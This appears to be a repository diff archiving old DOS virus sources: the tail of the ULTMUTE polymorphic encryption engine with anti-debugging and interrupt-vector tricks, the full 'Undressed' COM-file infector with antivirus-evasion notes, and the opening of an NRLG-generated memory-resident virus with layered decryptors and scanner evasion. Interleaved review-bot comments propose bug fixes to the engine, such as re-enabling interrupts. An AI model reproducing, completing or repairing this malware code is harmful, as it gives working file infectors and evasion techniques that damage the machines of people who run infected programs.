;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
_ULTMUTE:
|
||||
push bp ax bx cx dx es ds si di
|
||||
call Get_Our_Offset
|
||||
Offset_Mark:
|
||||
inc cx
|
||||
inc cx
|
||||
mov word ptr cs:[bp+1+Set_Size],cx
|
||||
mov word ptr cs:[Start_Pos+bp],bx
|
||||
call Init_Rand
|
||||
call Get_Base_Reg
|
||||
call Setup_Choices
|
||||
call Create_EncDec
|
||||
call Copy_Decrypt_Code
|
||||
call Encrypt_It
|
||||
Ending_ULTMUTE:
|
||||
pop di si ds es dx cx bx ax
|
||||
add cx,cs:[Decryptor_Length+bp]
|
||||
inc cx
|
||||
inc cx
|
||||
pop bp
|
||||
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
|
||||
je Int_Call
|
||||
cmp ax,2
|
||||
je Far_Call
|
||||
Near_Call:
|
||||
retn
|
||||
Far_Call:
|
||||
retf
|
||||
Int_Call:
|
||||
iret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Our_Offset:
|
||||
mov bp,sp
|
||||
mov bp,ss:[bp] ;This trick finds our current offset
|
||||
sub bp,offset Offset_Mark ;from the compiling point, as it
|
||||
ret ;is usually not constant....
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Init_Rand:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov ax,ds:[46c] ;Get seed from timer click at
|
||||
pop ds ;0000:046c
|
||||
mov cs:[rand_seed+bp],ax
|
||||
pop ax
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Rand:
|
||||
push cx dx
|
||||
mov ax,cs:[rand_seed+bp]
|
||||
mov cx,0deadh
|
||||
mul cx ;This probably isn't a good algorithm,
|
||||
xor ax,0dada ;(understatement) but it works for
|
||||
ror ax,1 ;our purposes in this application.
|
||||
mov cs:[rand_seed+bp],ax
|
||||
pop dx cx
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
rand_seed dw 0
|
||||
Base_Reg db 0
|
||||
Base_Pointer db 0
|
||||
Start_Pos dw 0
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Base_Reg:
|
||||
call Get_Rand
|
||||
and ax,11b
|
||||
cmp al,1 ;Eliminate CX for loop purposes
|
||||
je Get_Base_Reg
|
||||
mov byte ptr cs:[bp+Base_Reg],al
|
||||
Do_Pointer_Reg:
|
||||
call Get_Rand
|
||||
shr al,1
|
||||
jc Done_Base_Reg
|
||||
mov byte ptr cs:[bp+Base_Pointer],0
|
||||
ret
|
||||
Done_Base_Reg:
|
||||
mov byte ptr cs:[bp+Base_Pointer],1
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Setup_Choices:
|
||||
push ds si
|
||||
push cs
|
||||
pop ds
|
||||
mov si,bp
|
||||
|
||||
call Get_Rand
|
||||
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
|
||||
call Get_Rand
|
||||
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
|
||||
mov word ptr [si+Dummy7+2],ax
|
||||
|
||||
call Get_Rand ;Randomize Add/Sub
|
||||
mov word ptr [si+Dummy4+2],ax
|
||||
mov word ptr [si+Dummy8+2],ax
|
||||
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
|
||||
mov byte ptr [si+Rand_Byte2],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte3],al
|
||||
mov byte ptr [si+Rand_Byte4],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte5],al
|
||||
mov byte ptr [si+Rand_Byte6],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte7],al
|
||||
mov byte ptr [si+Rand_Byte8],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte9],al
|
||||
mov byte ptr [si+Rand_Byte10],ah
|
||||
|
||||
mov al,byte ptr [si+Base_Reg]
|
||||
Set_Switcher:
|
||||
and byte ptr [si+Switcher+1],0e6 ;Delete Register
|
||||
mov ah,al
|
||||
shl ah,1
|
||||
shl ah,1
|
||||
shl ah,1
|
||||
or byte ptr [Switcher+1+si],ah
|
||||
Set_Switcher_Pointer:
|
||||
push ax
|
||||
mov al,byte ptr [si+Base_Pointer]
|
||||
or byte ptr [si+Switcher+1],al
|
||||
Set_Set_Pointy:
|
||||
and byte ptr [si+Set_Pointy],0fe
|
||||
or byte ptr [si+Set_Pointy],al
|
||||
and byte ptr [si+Inc_Pointy],0fe
|
||||
or byte ptr [si+Inc_Pointy],al
|
||||
and byte ptr [si+Inc_Pointy+1],0fe
|
||||
or byte ptr [si+Inc_Pointy+1],al
|
||||
pop ax
|
||||
Set_Xorit:
|
||||
and byte ptr [si+Xor_It+1],0fc
|
||||
or byte ptr [si+Xor_It+1],al
|
||||
Set_Flip_It:
|
||||
and byte ptr [si+Flip_It+1],0e4
|
||||
or byte ptr [si+Flip_It+1],al
|
||||
or byte ptr [si+Flip_It+1],ah
|
||||
Set_Rotate_It:
|
||||
and byte ptr [si+do_rotate+1],0fc
|
||||
or byte ptr [si+do_rotate+1],al
|
||||
and byte ptr [si+do_rot2+1],0fc
|
||||
or byte ptr [si+do_rot2+1],al
|
||||
Set_IncDec:
|
||||
and byte ptr [si+inc_bx_com],0fc
|
||||
or byte ptr [si+inc_bx_com],al
|
||||
and byte ptr [si+dec_bx_com],0fc
|
||||
or byte ptr [si+dec_bx_com],al
|
||||
|
||||
and byte ptr [si+Dummy5],0fc
|
||||
or byte ptr [si+Dummy5],al
|
||||
and byte ptr [si+Dummy6],0fc
|
||||
or byte ptr [si+Dummy6],al
|
||||
|
||||
Set_AddSub:
|
||||
and byte ptr [si+Dummy3+1],0fc
|
||||
and byte ptr [si+Dummy4+1],0fc
|
||||
or byte ptr [si+Dummy3+1],al
|
||||
or byte ptr [si+Dummy4+1],al
|
||||
|
||||
and byte ptr [si+Dummy7+1],0fc
|
||||
and byte ptr [si+Dummy8+1],0fc
|
||||
or byte ptr [si+Dummy7+1],al
|
||||
or byte ptr [si+Dummy8+1],al
|
||||
pop si ds
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Create_EncDec:
|
||||
push es di cx
|
||||
push cs
|
||||
pop es
|
||||
lea di,[bp+Encrypt_Sequence]
|
||||
call Get_Rand
|
||||
and ax,1fh
|
||||
shr ax,1 ;Insure odd number of encryptors to prevent
|
||||
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
|
||||
inc ax ;unencrypted.
|
||||
|
||||
mov byte ptr cs:[bp+Encrypt_Length],al
|
||||
xchg cx,ax
|
||||
Make_Pattern:
|
||||
call Get_Rand
|
||||
and ax,7
|
||||
stosb
|
||||
loop Make_Pattern
|
||||
pop cx di es
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Copy_Decrypt_Code:
|
||||
push si di bx cx ds
|
||||
push bx di ;save for loop
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
lea si,[bp+Set_Pointy]
|
||||
movsw
|
||||
movsb
|
||||
lodsb ;Copy initial encryptor
|
||||
movsw
|
||||
movsb
|
||||
lodsb
|
||||
movsw
|
||||
|
||||
mov cl,byte ptr cs:[bp+Encrypt_Length]
|
||||
xor ch,ch
|
||||
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
|
||||
Dec_Set_Loop:
|
||||
push cx
|
||||
lodsb
|
||||
push si ;Create the Decryptor from Sequence
|
||||
|
||||
mov bl,al
|
||||
xor bh,bh
|
||||
shl bx,1
|
||||
add bx,bp
|
||||
add bx,offset Command_Table
|
||||
mov ax,cs:[bx]
|
||||
|
||||
mov cl,ah
|
||||
xor ah,ah
|
||||
|
||||
lea si,[Xor_It+bp]
|
||||
add si,ax
|
||||
repnz movsb
|
||||
|
||||
pop si
|
||||
pop cx
|
||||
loop Dec_Set_Loop
|
||||
|
||||
|
||||
lea si,[Switcher+bp]
|
||||
movsw
|
||||
lodsb ;Finish off Decryptor
|
||||
movsw
|
||||
lodsb
|
||||
|
||||
movsw ;Loop Setup
|
||||
movsw
|
||||
|
||||
pop si bx
|
||||
mov ax,di ;Set Loop
|
||||
sub ax,si ;Do size of loop and offset from loop
|
||||
|
||||
mov cs:[Decryptor_Length+bp],ax
|
||||
|
||||
push ax ;Changed for Jump
|
||||
not ax
|
||||
add ax,5
|
||||
stosw
|
||||
pop ax
|
||||
|
||||
add bx,ax ;Set initial Pointer
|
||||
mov es:[si+1],bx
|
||||
|
||||
mov ax,di
|
||||
pop ds cx bx di si
|
||||
push si di bx cx
|
||||
Copy_Prog:
|
||||
push ax
|
||||
sub ax,di
|
||||
add ax,bx
|
||||
mov word ptr es:[di+1],ax
|
||||
pop ax
|
||||
mov di,ax
|
||||
repnz movsb
|
||||
pop cx bx di si
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Encrypt_It:
|
||||
push bx cx di si
|
||||
|
||||
call set_seqp
|
||||
|
||||
mov ax,cs:[Decryptor_Length+bp]
|
||||
inc ax
|
||||
inc ax
|
||||
add di,ax ;DI=start of code to be encrypted
|
||||
;CX=Length of code to encrypt
|
||||
mov si,di
|
||||
push es
|
||||
pop ds
|
||||
Big_Enc_Loop:
|
||||
push cx
|
||||
call Switcher
|
||||
mov cx,cs:[Encrypt_Length+bp]
|
||||
|
||||
Encrypt_Value:
|
||||
push ax bx cx dx si di
|
||||
mov si,cs:[Save_SI+bp]
|
||||
dec si
|
||||
mov bl,cs:[si] ;??
|
||||
mov cs:[Save_SI+bp],si
|
||||
lea si,cs:[Com_Table_2+bp]
|
||||
xor bh,bh
|
||||
shl bx,1
|
||||
add si,bx
|
||||
mov bx,cs:[si]
|
||||
add bx,bp
|
||||
mov word ptr cs:[Next_Command+bp],bx
|
||||
pop di si dx cx bx ax
|
||||
call cs:[Next_Command+bp]
|
||||
Loop Encrypt_Value
|
||||
|
||||
pop cx
|
||||
call Switcher
|
||||
call Inc_Pointy
|
||||
call set_seqp
|
||||
loop Big_Enc_Loop
|
||||
pop si di cx bx
|
||||
ret
|
||||
|
||||
Save_SI dw 0
|
||||
Next_Command dw 0
|
||||
set_seqp:
|
||||
push si
|
||||
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
|
||||
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
|
||||
mov cs:[Save_SI+bp],SI
|
||||
pop si
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Command_Table: ;8 commands -> 3 bits.
|
||||
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
|
||||
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
|
||||
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
|
||||
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
|
||||
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
|
||||
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
|
||||
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
|
||||
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
|
||||
Com_Table_2:
|
||||
dw [offset Xor_It]
|
||||
dw [offset Flip_It]
|
||||
dw [offset Rotate_It_2]
|
||||
dw [offset Rotate_It_1]
|
||||
dw [offset Dummy5]
|
||||
dw [offset Dummy6]
|
||||
dw [offset Dummy7]
|
||||
dw [offset Dummy8]
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Set_Pointy:
|
||||
mov di,1234 ;Pointer to Code
|
||||
ret
|
||||
Set_Size:
|
||||
mov cx,1234 ;Size
|
||||
ret
|
||||
Switcher:
|
||||
xchg bx,[di]
|
||||
ret
|
||||
Inc_Pointy:
|
||||
inc di
|
||||
inc di
|
||||
ret
|
||||
|
||||
Loop_Mut:
|
||||
dec cx
|
||||
jz End_Loop_Mut
|
||||
loop_set:
|
||||
jmp _ULTMUTE
|
||||
End_Loop_Mut:
|
||||
ret
|
||||
Xor_It:
|
||||
xor bx,1234
|
||||
ret
|
||||
Flip_It:
|
||||
xchg bh,bl
|
||||
ret
|
||||
|
||||
Rotate_It_1:
|
||||
jmp before_rot
|
||||
do_rotate:
|
||||
ror bx,1
|
||||
jmp after_rot
|
||||
before_rot:
|
||||
push ax
|
||||
call Ports1
|
||||
pop ax
|
||||
jmp do_rotate
|
||||
Ports1:
|
||||
in al,21
|
||||
or al,02
|
||||
out 21,al
|
||||
ret
|
||||
|
||||
Ports2:
|
||||
in al,21
|
||||
xor al,02
|
||||
out 21,al
|
||||
ret
|
||||
after_rot:
|
||||
push ax
|
||||
call ports2
|
||||
pop ax
|
||||
ret
|
||||
|
||||
Rotate_It_2:
|
||||
cli
|
||||
jmp confuzzled1
|
||||
do_rot2:
|
||||
rol bx,1
|
||||
call Switch_Int_1_3
|
||||
jmp donerot2
|
||||
|
||||
confuzzled1:
|
||||
call Switch_Int_1_3
|
||||
jmp do_rot2
|
||||
|
||||
Switch_Int_1_3:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
jmp short exch1
|
||||
db 0eah
|
||||
exch1:
|
||||
xchg ax,word ptr ds:[4]
|
||||
jmp short exch2
|
||||
db 9ah
|
||||
exch2:
|
||||
xchg ax,word ptr ds:[0c]
|
||||
xchg ax,word ptr ds:[4]
|
||||
pop ds ax
|
||||
ret
|
||||
donerot2:
|
||||
ret
|
||||
|
||||
Dummy1:
|
||||
jmp short inc_bx_com ;Kill Disassemblers
|
||||
db 0ea
|
||||
Rand_Byte1:
|
||||
db 0ea
|
||||
inc_bx_com:
|
||||
inc bx
|
||||
ret
|
||||
Dummy2:
|
||||
jmp short Kill_1
|
||||
Rand_Byte2:
|
||||
db 0ea
|
||||
Cont_Kill1:
|
||||
cli
|
||||
xchg ax,ds:[84]
|
||||
xchg ax,ds:[84]
|
||||
sti
|
||||
pop ds ax
|
||||
dec_bx_com:
|
||||
dec bx
|
||||
jmp short quit_Kill1
|
||||
Kill_1:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax ;Anti-Debugger (Kills Int 21)
|
||||
jmp short Cont_Kill1
|
||||
Rand_Byte3:
|
||||
db 0e8
|
||||
quit_Kill1:
|
||||
ret
|
||||
Dummy3:
|
||||
add bx,1234
|
||||
push bx
|
||||
call throw_debugger
|
||||
Rand_Byte4:
|
||||
db 0e8 ;Prefetch Trick
|
||||
into_throw:
|
||||
sub bx,offset Rand_Byte4
|
||||
add byte ptr [bx+trick_em+1],0ba
|
||||
trick_em:
|
||||
jmp short done_trick
|
||||
Rand_Byte5:
|
||||
db 0ea
|
||||
throw_debugger:
|
||||
pop bx
|
||||
jmp short into_throw
|
||||
Rand_Byte6:
|
||||
db 0ea
|
||||
done_trick:
|
||||
sub byte ptr [bx+trick_em+1],0ba
|
||||
pop bx
|
||||
ret
|
||||
Dummy4:
|
||||
sub bx,1234
|
||||
jmp short Get_IRQ
|
||||
Rand_Byte7 db 0e8
|
||||
Kill_IRQ:
|
||||
out 21,al
|
||||
xor al,2
|
||||
jmp short Restore_IRQ
|
||||
Rand_Byte8 db 0e8
|
||||
Rand_Byte9 db 0e8 ;This will kill the keyboard
|
||||
Get_IRQ: ;IRQ
|
||||
push ax
|
||||
in al,21
|
||||
xor al,2
|
||||
jmp short Kill_IRQ
|
||||
Rand_Byte10 db 0e8
|
||||
Restore_IRQ:
|
||||
out 21,al
|
||||
pop ax
|
||||
ret
|
||||
|
||||
;The following are used for the encryption algorithm to reverse commands that
|
||||
;include anti-tracing.
|
||||
Dummy5:
|
||||
dec bx
|
||||
ret
|
||||
Dummy6:
|
||||
inc bx
|
||||
ret
|
||||
Dummy7:
|
||||
sub bx,1234
|
||||
ret
|
||||
Dummy8:
|
||||
add bx,1234
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Decryptor_Length dw 0
|
||||
Encrypt_Length dw 0
|
||||
Encrypt_Sequence db 30 dup(0)
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
_END_ULTMUTE:
|
||||
end _ULTMUTE
|
|
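Review bot: Rotate_It_2 executes `cli` on entry and never re-enables interrupts — none of do_rot2, Switch_Int_1_3 or donerot2 contains an `sti` — so every emitted decryptor containing command 3, and the engine itself whenever Encrypt_It dispatches sequence value 2 through Com_Table_2, leaves interrupts disabled unless a later Dummy2 happens to run its own `sti`; a near- or far-call user of _ULTMUTE inherits that state, since only the Int_Call path's `iret` restores flags. The smallest fix is `donerot2: sti` ahead of the `ret`, which the Command_Table length arithmetic picks up automatically. Separately, the only entropy is the 16-bit tick count read from 0000:046C in Init_Rand, and every key, register choice and command sequence is derived from it by Get_Rand, so all 65536 possible outputs can be regenerated offline; the header already disclaims cryptographic strength, but the "security-type applications" wording deserves an explicit `;NOTE: 16-bit timer seed -> at most 65536 distinct decryptors; not a secrecy mechanism`. The emitted code also writes PIC port 21h and swaps the INT 1/INT 3/INT 21h vectors directly, which presumably faults or misbehaves under a protected-mode host — not verifiable from the listing, but worth stating in the header.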
@ -0,0 +1,126 @@
|
|||
; Virus: The Undressed Virus
|
||||
; Author: Arsonic[Codebreakers]
|
||||
; Type: Appending
|
||||
; Encryption: No
|
||||
;
|
||||
; Displays a Message on Feb 5th.
|
||||
; Btw.. I Love Lisa..!
|
||||
;---------------------------------------------------------------------------------------------------
|
||||
; AV-Product | Detected? | Comments
|
||||
;---------------------------------------------------------------------------------------------------
|
||||
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
|
||||
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
|
||||
; AVP | VCL.824 | VCL! ARRGGGHH!
|
||||
;----------------------------------------------------------------------------------------------------
|
||||
db 0e9h,0,0
|
||||
start:
|
||||
call delta
|
||||
delta:
|
||||
pop bp
|
||||
sub bp,offset delta
|
||||
mov cx,0ffffh ;kill heristics
|
||||
fprot_loopy:
|
||||
jmp back
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
back:
|
||||
loop fprot_loopy
|
||||
mov cx,3
|
||||
nop
|
||||
mov di,100h
|
||||
nop
|
||||
lea si,[bp+buffer]
|
||||
nop
|
||||
rep movsb
|
||||
find_first:
|
||||
mov ah,4ch
|
||||
add ah,2
|
||||
nop
|
||||
find_next:
|
||||
nop
|
||||
lea dx,[bp+filemask]
|
||||
nop
|
||||
int 21h
|
||||
jnc infect
|
||||
jmp check_payload
|
||||
infect:
|
||||
mov ax,3d02h
|
||||
mov dx,9eh
|
||||
int 21h
|
||||
xchg ax,bx
|
||||
mov ah,3dh
|
||||
add ah,2
|
||||
mov cx,3
|
||||
lea dx,[bp+buffer]
|
||||
int 21h
|
||||
mov ax,word ptr[80h + 1ah]
|
||||
nop
|
||||
sub ax,end - start + 3
|
||||
nop
|
||||
cmp ax,word ptr[bp+buffer+1]
|
||||
nop
|
||||
je close_file
|
||||
mov ax,word ptr[80h + 1ah]
|
||||
nop
|
||||
sub ax,3
|
||||
nop
|
||||
mov word ptr[bp+three+1],ax
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21h
|
||||
mov ah,3eh
|
||||
add ah,2
|
||||
nop
|
||||
lea dx,[bp+three]
|
||||
nop
|
||||
mov cx,3
|
||||
nop
|
||||
int 21h
|
||||
mov ax,4202h
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21h
|
||||
mov ah,3eh
|
||||
add ah,2
|
||||
nop
|
||||
lea dx,[bp+start]
|
||||
nop
|
||||
mov cx,end - start
|
||||
nop
|
||||
int 21h
|
||||
close_file:
|
||||
mov ah,3ch
|
||||
add ah,2
|
||||
int 21h
|
||||
mov ah,4dh
|
||||
add ah,2
|
||||
jmp find_next
|
||||
check_payload:
|
||||
mov ah,2ah
|
||||
int 21h
|
||||
cmp dh,2 ;is it febuary?
|
||||
je next
|
||||
jmp close
|
||||
next:
|
||||
cmp dl,5 ;the 5th?
|
||||
je payload ;yes.. display the message
|
||||
jmp close ;no.. return control to the program.
|
||||
payload:
|
||||
mov ah,9h ;display message
|
||||
lea dx,[bp+message]
|
||||
int 21h
|
||||
int 00h ;get keypress
|
||||
int 16h
|
||||
int 20h ;return to dos.
|
||||
close:
|
||||
mov di,100h ;return control to program
|
||||
jmp di
|
||||
three db 0e9h,0,0
|
||||
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
|
||||
buffer db 0cdh,20h,0
|
||||
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
|
||||
author db 'Arsonic[CB]',0 ; nice scan string..
|
||||
message db 'Happy Birthday Lisa!',10,13,'$'
|
||||
Lisa db 'I LOVE U LISA!',0
|
||||
end:
|
|
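Review bot: The file header (L66811–L66829) names the author and the infection type but gives no publication source or date, so a reader of this archive cannot tell where the listing was taken from; the ussr516 listing later in the commit (L68788–L68791) does credit its source, while the NRLG listing (L67192–L67210) credits only the generator. A one-line comment in each file such as `; Source: <PUBLICATION/ISSUE>, <YEAR> - archived as published, unmodified` would make the three consistent and records provenance for anyone comparing the copies with other collections. The vlad#4 section (L68603 onward) is an e-zine article with listings embedded in prose rather than a source file, and its file name or extension should say so.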
@ -0,0 +1,473 @@
|
|||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
|
||||
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
|
||||
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
|
||||
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
|
||||
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
.286
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: CALL NEXT
|
||||
|
||||
NEXT:
|
||||
mov di,sp ;take the stack pointer location
|
||||
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
|
||||
sub bp,offset next ;subtract the large code off this code
|
||||
;
|
||||
;*******************************************************************
|
||||
; #1 DECRYPT ROUTINE
|
||||
;*******************************************************************
|
||||
|
||||
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
|
||||
je crypt2 ;yes! not decrypt
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt]+ bp ;di = first byte to decrypt
|
||||
mov dx,1 ;dx = value for decrypt
|
||||
;----------------------------------------------------------
|
||||
deci: ;deci = fuck label!
|
||||
;----------------------------------------------------------
|
||||
|
||||
ÿsub byte ptr [di],087h
|
||||
inc word ptr [di]
|
||||
xor byte ptr [di],022h
|
||||
inc word ptr [di]
|
||||
xor byte ptr [di],030h
|
||||
add byte ptr [di],075h
|
||||
xor byte ptr [di],061h
|
||||
sub byte ptr [di],0b9h
|
||||
xor word ptr [di],0e185h
|
||||
add word ptr [di],0aa17h
|
||||
not word ptr [di]
|
||||
inc byte ptr [di]
|
||||
inc word ptr [di]
|
||||
xor word ptr [di],0c3d7h
|
||||
sub word ptr [di],04a83h
|
||||
not byte ptr [di]
|
||||
xor word ptr [di],06acdh
|
||||
ÿinc di
|
||||
inc di
|
||||
;----------------------------------------------------------
|
||||
jmp bye ;######## BYE BYE F-PROT ! ##########
|
||||
mov ah,4ch
|
||||
int 21h
|
||||
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
|
||||
;-----------------------------------------------------------
|
||||
mov ah,0bh ;######### BYE BYE TBAV ! ##########
|
||||
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
|
||||
;----------------------------------------------------------
|
||||
loop deci ;repeat please!
|
||||
;
|
||||
;*****************************************************************
|
||||
; #2 DECRYPT ROUTINE
|
||||
;*****************************************************************
|
||||
;
|
||||
crypt: ;fuck label!
|
||||
;
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt2] + bp ;di = first byte to decrypt
|
||||
;---------------------------------------------------------------
|
||||
deci2: ;
|
||||
xor byte ptr cs:[di],1 ;decrytion rutine
|
||||
inc di ;very simple...
|
||||
loop deci2 ;
|
||||
;---------------------------------------------------------------
|
||||
crypt2: ;fuck label!
|
||||
;
|
||||
MOV AX,0CACAH ;call to my resident interrup mask
|
||||
INT 21H ;for chek "I'm is residet?"
|
||||
CMP Bh,0CAH ;is equal to CACA?
|
||||
JE PUM2 ;yes! jump to runnig program
|
||||
call action
|
||||
;*****************************************************************
|
||||
; NRLG FUNCTIONS (SELECTABLE)
|
||||
;*****************************************************************
|
||||
|
||||
ÿcall ANTI_V
|
||||
;****************************************************************
|
||||
; PROCESS TO REMAIN RESIDENT
|
||||
;****************************************************************
|
||||
|
||||
mov ax,3521h
|
||||
int 21h ;store the int 21 vectors
|
||||
mov word ptr [bp+int21],bx ;in cs:int21
|
||||
mov word ptr [bp+int21+2],es ;
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ax ;ax = my actual segment
|
||||
dec ax ;dec my segment for look my MCB
|
||||
mov es,ax ;
|
||||
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop es ;
|
||||
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
|
||||
sub bx,17 + offset fin ;and 100H for the PSP total
|
||||
